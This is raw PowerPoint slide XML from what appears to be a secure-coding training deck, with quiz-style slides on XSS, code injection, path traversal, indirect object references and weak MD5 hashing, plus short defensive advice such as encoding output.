              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E343B43-8C29-C14B-B106-F29A19F9789E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="24" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5574146" y="3201838"/>
            <a:ext cx="1522800" cy="332957"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -25676"/>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E4F600-5B81-8C47-99BC-5D8CBC86C129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5226796" y="3635029"/>
            <a:ext cx="1318053" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data breach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE739CCA-E65E-5C48-9610-378E29E2B701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7360920" y="1260748"/>
            <a:ext cx="4164059" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" dirty="0"/>
              <a:t>If sensitive data is not protected, a security incident will lead to a full scale data breach.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="965833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(Data is written into a dangerous HTML attribute)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2876341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01135-261A-1E4F-8E34-47CB8DC0714D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4730" y="485014"/>
            <a:ext cx="12196729" cy="5585261"/>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2591489"/>
            <a:ext cx="12192000" cy="279024"/>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4731" y="5423769"/>
            <a:ext cx="12192000" cy="280102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF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515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(Code is executing a dangerous function, actually an example of code </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="4000" b="1" i="0" u="sng"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injection</a:t>
            </a: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075134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AB48D-1309-0142-9197-D87FC0D485D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="869949"/>
            <a:ext cx="12183438" cy="5155069"/>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8562" y="2190656"/>
            <a:ext cx="12192000" cy="279024"/>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95249" y="4321479"/>
            <a:ext cx="12039389" cy="280102"/>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719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Bottom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(Input is being reflected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>between the &lt;script&gt; tags</a:t>
            </a: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176507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690688"/>
            <a:ext cx="10931434" cy="4570376"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>easy</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to introduce and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>easy</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to find </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>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should be applied to all server side generated content. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Additional encoding of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>single quotes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dangerous HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>contexts should be handled with care or avoided</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954228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A5BF-0BA2-654A-A4BD-1C01C72AD1B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Indirect Object References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="67" name="Group 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DB3D9AE-A19D-F642-B2A0-34AEFFE2CEF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2910869" y="1814914"/>
            <a:ext cx="5001427" cy="3734772"/>
            <a:chOff x="825591" y="1703402"/>
            <a:chExt cx="5001427" cy="3734772"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="495300" dir="840000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="15000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Oval 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D1FAB00-A9D8-5940-AA7A-0297A57EBFF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="898743" y="1703402"/>
              <a:ext cx="9144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638C01-3890-3248-8FF9-1059E7972978}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4912618" y="3125162"/>
              <a:ext cx="914400" cy="914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87E056-E4A2-8948-BE74-D8DC0F00C536}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2692576" y="1703996"/>
              <a:ext cx="914400"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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57A9C97B-416C-DF42-BC88-6DCF2553C406}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2692576" y="3125162"/>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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A71D99E3-3E5F-E242-B445-C342CC0BEF39}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2692576" y="4419599"/>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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Curved Connector 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6614FFBE-EF57-874F-B1F5-5539571C7575}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="12" idx="1"/>
              <a:endCxn id="6" idx="5"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="2975290" y="1187833"/>
              <a:ext cx="775182" cy="3367297"/>
            </a:xfrm>
            <a:prstGeom prst="curved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02ACF99F-393C-7443-9EF3-1688C5DB6A23}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="825591" y="3125162"/>
              <a:ext cx="1060704" cy="914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gular Pentagon 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68597209-E935-B747-A9A2-488D0F684238}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="875883" y="4523774"/>
              <a:ext cx="960120" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="pen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30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5341158E-367A-8449-AC1F-67CBF87BE7CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="13" idx="1"/>
              <a:endCxn id="6" idx="6"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1813144" y="2160602"/>
              <a:ext cx="879433" cy="594"/>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25B974C6-3FCF-0A49-A8B2-2901BBE801D8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="14" idx="1"/>
              <a:endCxn id="25" idx="5"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1621120" y="3582362"/>
              <a:ext cx="1071457" cy="12700"/>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FB612D5-486F-AC47-B851-E662CAC0B864}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="15" idx="1"/>
              <a:endCxn id="26" idx="5"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1836002" y="4873043"/>
              <a:ext cx="856574" cy="3756"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="539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Multiply 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34643B39-5E7B-6A4E-ADA4-308CC9CC2709}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3689235" y="2472313"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="mathMultiply">
              <a:avLst>
                <a:gd name="adj1" fmla="val 133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48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74DC2E18-F34C-2D48-AB0B-D9923E3426CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="12" idx="0"/>
              <a:endCxn id="13" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="4006414" y="1761758"/>
              <a:ext cx="963966" cy="1762842"/>
            </a:xfrm>
            <a:prstGeom prst="curved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332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B74973-79DF-714C-909D-0723420CF39C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613459" y="3646026"/>
            <a:ext cx="7616141" cy="2879465"/>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prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LET'S PLAY,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600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SPOT THE PATH TRAVERSAL!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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1270509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72629-D8E7-D74B-BC34-3B00466BB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2498"/>
            <a:ext cx="12192000" cy="6693003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF4AF4FC-0BC1-3D4B-A22B-F088D3CA4255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1322555"/>
            <a:ext cx="12192000" cy="279024"/>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2D56733-FC16-F548-B3F4-690DD57E0CB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4645571"/>
            <a:ext cx="12192000" cy="280102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF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338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1558726-2A92-E545-9B9A-2B9264AE499C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="891251" y="972273"/>
            <a:ext cx="10764455" cy="5197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Answer: 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(Input is concatenated to a system path allowing manipulation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="410863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urved Connector 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51715C61-952D-8E41-95AA-3E098908E3FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="5"/>
            <a:endCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2116212" y="2232102"/>
            <a:ext cx="2008007" cy="2939203"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -171390"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="1238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19F278-5918-4844-9360-D0F6379D5377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="851197" y="285886"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use of a Broken Crypto Algorithm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Cube 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79278438-1F32-8642-8F77-1921373ABF6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1204684" y="1675596"/>
            <a:ext cx="870558" cy="1330651"/>
          </a:xfrm>
          <a:prstGeom prst="cub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8744EB57-9B28-1E47-9B45-665580CDC03F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253661" y="1675596"/>
            <a:ext cx="870558" cy="1330651"/>
          </a:xfrm>
          <a:prstGeom prst="cub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135DD-8E7A-8041-9988-8EFDED0629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4798071" y="2013795"/>
            <a:ext cx="718457" cy="872837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2602973-A5BC-3E44-AA7D-E379A474EF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712" y="4695055"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D85590B4-4ED1-FF48-9D1D-82FDFE5F903B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331223" y="5654250"/>
            <a:ext cx="617477" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Curved Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{459FA23F-A456-8144-8165-48011C5A2E14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="2"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1015319" y="4070411"/>
            <a:ext cx="1249288" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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A6D62B-6B1A-F441-840D-3F665413C700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="903992" y="3076435"/>
            <a:ext cx="1471941" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{187CF9D6-1F8B-1342-B0B5-BBD8C44A0370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1684751" y="3951962"/>
            <a:ext cx="1942263" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expected File Hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MD5, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1234</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F26BCB06-6F8D-9942-B678-33D0B5995107}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4329716" y="2795923"/>
            <a:ext cx="2604303" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MD5</a:t>
            </a:r>
            <a:r>
